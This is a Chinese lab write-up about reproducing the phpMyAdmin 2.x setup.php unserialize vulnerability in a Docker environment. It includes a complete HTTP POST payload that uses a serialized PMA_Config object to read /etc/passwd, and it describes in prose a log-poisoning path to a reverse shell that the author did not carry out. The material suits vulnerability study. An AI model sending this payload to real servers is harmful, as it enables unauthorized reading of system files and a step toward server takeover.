编程开源技术交流,分享技术与知识

网站首页 > 开源技术 正文

学习phpMyAdmin scripts:setup.php 反序列化漏洞

wxchong 2025-04-08 19:50:57 开源技术 14 ℃ 0 评论

phpMyadmin是一套开源的、基于Web的Mysql数据库管理工具。这个实验利用php的反序列化实现了任意文件读取,影响的版本是phpMyAdmin 2.x,然鹅,令人激动的是网上有师傅分享了利用该漏洞实现了反弹shell,思路是先访问出错,让access.log或者error.log记录出错信息,然后在利用反序列化读取access.log或者error.log文件中的代码,实现反弹shell,心动不如行动~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好书籍配套实验环境,进入目录 ,开始复现漏洞

  • docker-compose build //可选
  • docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

  • docker-compose down
  • docker system prune -a -f //可选

简单访问一下,说明phpMyAdmin scripts:setup.php 反序列化漏洞(WooYun-2016-199433)环境搭建成功了

掏出burpsuite准备发一个POST请求,获取etc目录下的passwd文件内容

POST /scripts/setup.php HTTP/1.1
Host: 144.34.162.13:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

由于这个实验中,无法记录请求,因此,就没有继续复现反弹shell了

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表